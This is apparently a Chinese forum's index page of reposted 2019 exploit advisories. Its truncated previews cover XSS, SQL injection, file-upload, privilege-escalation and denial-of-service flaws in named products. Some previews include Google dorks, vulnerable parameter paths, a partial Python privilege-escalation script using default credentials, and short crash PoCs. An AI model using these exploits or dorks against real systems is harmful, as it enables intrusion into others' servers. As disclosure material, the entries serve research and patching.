CHT漏洞数据库
记录包含各种WordPress/Windows/PHP/Linux等各种系统漏洞或模板。
15,047个主题在此版块
-
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting # Google Dork: N/A # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://zuz.host/ # Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476 # Version: 2.1 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability. # POC: ---------------------- 1. Go To https://[PATH]/contact 2. There are three vulnerable parameters name, subject and message. 3. Inject the Jav…
尖REN的最后回复, -
- 0 篇回复
- 91 次查看
################################################################################################################################## # Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.arangodb.com # Software Link: https://www.arangodb.com/download-major/ # Version: 3.4.2-1 ################################################################################################################################## Introduction ArangoDB is a native multi-model, open-source database with flexible data models for documents, graphs, and key-values. Build high performance applications usi…
RenX6的最后回复, -
- 0 篇回复
- 112 次查看
#!/usr/env/python3 """ Vulnerability title: M/Monit <= 3.7.2 - Privilege Escalation Author: Dolev Farhi Vulnerable version: 2.0.151021 Link: https://mmonit.com Date: 2/17/2019 """ import sys import requests MMONIT_URL = 'http://ip.add.re.ss:8080' MMONIT_USER = 'monit' # Default built in unprivileged user MMONIT_PASS = 'monit' s = requests.Session() s.get(MMONIT_URL + '/') resp = s.post(MMONIT_URL + '/z_security_check', params={'z_username':MMONIT_USER,'z_password':MMONIT_PASS}) if 'Invalid username and/or password' in resp.text: print('Error logging in') sys.exit(1) zessionid = s.cookies.get_dict()['zsessionid'] headers = { 'CSRFToken':zessioni…
cnhackteam7的最后回复, -
- 0 篇回复
- 92 次查看
################################################################################################################################## # Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting # Date: 18.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://cdome.comodo.com/firewall/ # Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278 # Version: 2.7.0 ################################################################################################################################## Introduction Comodo Dome Firewall (DFW) provides comprehensive security for enterprise networks. The firewall software…
RenX6的最后回复, -
# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection # Google Dork: inurl:"assets/external/data.php" # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://themerig.com/ # Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597 # Demo Website: https://themerig.com/find/ # Version: 1.5 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- Find a Place CMS Directory 1.5 suffers from a SQL Injection vulnerability. # POC: ---------------------- 1. Access the following path ht…
Xiao7的最后回复, -
<?php # Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin [Payment Bypass / Unauthorized Order Status Spoofing] # Discovery Date: 14.12.2018 # Public Disclosure Date: 14.02.2019 # Exploit Author: GeekHack # Contact: https://t.me/GeekHack # Vendor Homepage: https://globee.com/ (previously payb.ee) # Software Link: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/releases/tag/v1.1.1 # Version: <= 1.1.1 # Tested on: WordPress 4.9.9 + WooCommerce 3.5.1 + GloBee Payment Gateway Plugin 1.1.1 # CVE: CVE-2018-20782 /* Description: Reliance on untrusted inputs (CWE-807), insufficient data verification and lack of any…
KaiWn的最后回复, -
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- $ bin/java -cp . DisplaySfntFont test.ttf Iteration (0,0) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007f42e9a30f79, pid=43119, tid=0x00007f431d7fc700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops) # Prob…
Anonymous的最后回复, -
# Exploit Title: Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 - arbitrary file upload # Date: 18-02-2019 # Exploit Author: Dao Duy Hung ([email protected]) # Vendor Homepage: https://www.manageengine.com/products/service-desk/ # Software Link: https://www.manageengine.com/products/service-desk/download.html?opDownload_indexbnr # Version: 9.4 and 10.0 before 10.0 build 10012 # Tested on: SDP 10.0 build 10000 # CVE : CVE-2019-8394 Detail: In file common/FileAttachment.jsp line 332 only check file upload extension when parameter 'module' equal to 'SSP' or 'DashBoard' or 'HomePage', and if parameter 'module' is set to 'CustomLogin' will skip check fil…
CHQ1d的最后回复, -
- 0 篇回复
- 85 次查看
################################################################################################################################## # Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://couchdb.apache.org # Software Link: http://couchdb.apache.org/#download # Version: 2.3.0 ################################################################################################################################## Introduction A CouchDB server hosts named databases, which store documents. Each document is uniquely named in the database, and CouchDB provides a RESTful HTTP API for reading and updating (a…
HACK7YD的最后回复, -
=========================================================================================== # Exploit Title: Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload # Dork: N/A # Date: 10-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/ # Software Link: https://sourceforge.net/projects/webinessinventory/files/ # Version: 2.3 # Category: Webapps # Tested on: Wamp64, Windows # CVE: CVE-2019-8404 # Software Description: Small stock inventory managment application for web. =========================================================================================== # POC: # Sign in to admin panel. then …
cnhackteam7的最后回复, -
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- Iteration (0,0) Iteration (0,1) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007f857116fde3, pid=31542, tid=0x00007f85a5a70700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops) # Problematic frame: # C [lib…
XenoG的最后回复, -
- 0 篇回复
- 83 次查看
# Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection # Google Dork: inurl:"pages.php?title=privacy-policy" # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://themerig.com/ # Software Link: https://codecanyon.net/item/listing-hub-cms-directory-listings-theme/21361294 # Demo Website: https://listing-hub.themerig.com # Version: 1.0 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- Listing Hub CMS 1.0 suffers from a SQL Injection vulnerability. # POC: ---------------------- 1. Access the following path https://[PATH]/pages.php?title=pr…
Xiao7的最后回复, -
- 0 篇回复
- 90 次查看
# Exploit Title: Admin auth bypass, SQLi and File Disclosure # Google Dork: no defacers please ! # Date: March 2019 (reported to vendor without response :D) # Exploit Author: Efren Diaz # Author contact: https://twitter.com/elefr3n # Vendor Homepage: https://www.edirectory.com/ # Software Link: not available # Version: All versions # Tested on: Ubuntu 14.04 # CVE : none #DESCRIPTION eDirectory is a software to create your own membership website, business directories, yellow pages, coupon sites, local guide, lead gen sites and more. # SQL Injection Links: - https://site.com/location.php?type=byId&id=[INT]&childLevel=[INT]&level=[SQLi] - https://site.com/…
Tenfk的最后回复, -
- 0 篇回复
- 87 次查看
#Exploit Title: NetSetMan 4.7.1 'Workgroup' - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2018-02-17 #Vendor Homepage: https://www.netsetman.com/ #Software Link: https://www.netsetman.com/netsetman.exe #Tested Version: 4.7.1 #Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1 #Steps to produce the crash: #1.- Run python code: NetSetMan_4.7.1.py #2.- Open netsetman.txt and copy content to clipboard #3.- Open NetSetMan #4.- Enable "Workgroup" and Paste Clipboard #5.- Click on "Activate" #6.- Crashed cod = "\x41" * 100 f = open('netsetman.txt', 'w') f.write(cod) f.close()
剑道尘心的最后回复, -
- 0 篇回复
- 86 次查看
#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2018-02-19 #Vendor Homepage: https://valentina-db.com/en/ #Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk #Tested Version: 9.0.4 #Tested on: Windows 7 x64 Service Pack 1 #Steps to produce the crash: #1.- Run python code: Valentina_Studio_9.0.4.py #2.- Open valentina.txt and copy content to clipboard #3.- Open Valentina Studio #4.- Select "File" > "Connect to" #5.- Select "Valentina Server" #6.- Select "Host" and Paste Clipboard #7.- Crashed cod = "\x41" * 256 f = open('valentina.txt', 'w') f.write(cod) f.clo…
尖REN的最后回复, -
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- $ bin/java -cp . DisplaySfntFont test.ttf Iteration (0,0) Iteration (0,1) Iteration (0,2) Iteration (0,3) Iteration (0,4) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007fbaa11694c8, pid=19540, tid=0x00007fbac4f18700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bi…
风尘剑心的最后回复, -
# Exploit Title: MaxxAudio Drivers WavesSysSvc64.exe File Permissions SYSTEM Privilege Escalation # Google Dork: # Date: 2/18/2019 # Exploit Author: Mike Siegel @ml_siegel # Vendor Homepage: https://maxx.com # Software Link: # Version: 1.6.2.0 (May affect other versions) # Tested on: Win 10 64 bit # CVE : CVE-2019-15084 MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations. MaxxAudio drivers version 1.6.2.0 install with incorrect file permissions. As a result a local attacker can escalate to SYSTEM level privileges. Dell PSIRT has acknowledged the issue and advises updating to …
KaiWn的最后回复, -
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of OpenType fonts. It manifests itself in the form of the following crash (with AFL's libdislocator): --- cut --- gdb$ c Continuing. Iteration (0,0) Thread 2 "java" received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x6d1a RBX: 0x7fffb5d94f48 --> 0x7fffb6319f00 --> 0x53ab1500ff RCX: 0xffffffffffff0000 RDX: 0x7fff28fbdfe6 --> 0x2a001d00100003 RSI: 0x7fff28fadfe8 --> 0x1e001100040000 [...] [-------…
轩辕三官的最后回复, -
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting # Google Dork: N/A # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://zuz.host/ # Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476 # Version: 2.1 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability. # POC: ---------------------- 1. Go To https://[PATH]/contact 2. There are three vulnerable parameters name, subject and message. 3. Inject the Jav…
Xiao7的最后回复, -
- 0 篇回复
- 80 次查看
################################################################################################################################## # Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.arangodb.com # Software Link: https://www.arangodb.com/download-major/ # Version: 3.4.2-1 ################################################################################################################################## Introduction ArangoDB is a native multi-model, open-source database with flexible data models for documents, graphs, and key-values. Build high performance applications usi…
HACK7YD的最后回复,